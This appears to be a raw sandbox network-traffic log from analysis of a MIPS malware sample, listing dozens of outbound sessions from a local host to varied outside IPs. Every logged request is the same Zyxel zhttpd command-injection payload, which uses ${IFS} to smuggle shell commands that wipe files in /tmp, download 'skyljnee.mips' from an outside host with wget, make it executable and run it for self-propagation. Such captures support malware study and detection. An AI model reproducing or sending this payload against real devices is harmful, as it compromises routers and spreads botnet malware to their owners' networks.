                                                Jan 28, 2024 10:16:12.617475033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1119192.168.2.2336666197.175.38.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.617490053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1120192.168.2.233810243.98.114.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.617521048 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1121192.168.2.234431078.40.255.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.617549896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1122192.168.2.234722899.156.102.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.617564917 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1123192.168.2.2336404205.166.129.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.617597103 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1124192.168.2.2337596109.119.106.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.617611885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1125192.168.2.2353458206.182.203.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.617650986 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1126192.168.2.234310276.222.36.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.617672920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1127192.168.2.2353868136.222.121.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.617683887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1128192.168.2.2343178113.64.165.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.617716074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1129192.168.2.2351000154.195.119.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.617723942 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1130192.168.2.2342728166.239.133.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.617753983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1131192.168.2.2334584120.145.193.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.617784977 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1132192.168.2.2333696176.249.139.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.617825985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1133192.168.2.2347468135.140.32.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.617855072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1134192.168.2.2348136201.125.194.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.617867947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1135192.168.2.2353326175.72.187.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.617904902 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1136192.168.2.2338874116.206.120.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.617948055 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1137192.168.2.233952670.163.119.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.617949963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1138192.168.2.2357692121.49.161.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.617999077 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1139192.168.2.2352260138.149.153.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.618030071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1140192.168.2.233310244.196.18.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.618038893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1141192.168.2.2343016171.12.60.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.618056059 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1142192.168.2.235195074.162.253.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.618072987 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1143192.168.2.234293025.69.228.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.618093967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1144192.168.2.23498741.5.3.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.618112087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1145192.168.2.234978868.173.208.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.618120909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1146192.168.2.2358012140.117.4.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.618156910 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1147192.168.2.235533614.81.180.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.618186951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1148192.168.2.236006850.197.166.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.618226051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1149192.168.2.233603292.27.169.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.618237972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1150192.168.2.2336846198.35.199.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.618268013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1151192.168.2.235989088.41.194.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.618308067 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1152192.168.2.234697485.76.68.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.618350029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1153192.168.2.2347252178.189.143.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.618372917 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1154192.168.2.2338034133.220.66.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.618400097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1155192.168.2.234585440.0.74.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.618419886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1156192.168.2.2339386160.69.71.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.618462086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1157192.168.2.233692451.232.29.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.618484020 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1158192.168.2.2359484114.193.187.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.618509054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1159192.168.2.2337644104.142.75.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.618541002 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1160192.168.2.2354298198.115.202.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.618549109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1161192.168.2.2335732139.6.190.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.618602037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1162192.168.2.233387873.120.140.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.618613958 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1163192.168.2.235732473.157.228.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.618652105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1164192.168.2.2340540207.253.192.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.618654013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1165192.168.2.236027295.226.242.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.618684053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1166192.168.2.233539478.202.128.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.618704081 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1167192.168.2.2357130203.139.126.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.618751049 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1168192.168.2.2348494217.196.1.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.618757010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1169192.168.2.2343546136.35.65.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.618766069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1170192.168.2.2358476212.166.107.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.618798971 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1171192.168.2.234066273.190.186.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.618817091 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1172192.168.2.234438043.22.58.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.618864059 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1173192.168.2.2344442131.70.161.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.618900061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1174192.168.2.2356442179.171.90.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.618918896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1175192.168.2.234295825.160.250.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.618927956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1176192.168.2.2349530132.137.123.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.618971109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1177192.168.2.2343402108.133.171.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.619015932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1178192.168.2.2348426222.161.117.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.619048119 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1179192.168.2.235074223.20.183.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:12.619051933 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1180192.168.2.2357536181.114.138.65443
                                                TimestampBytes transferredDirectionData
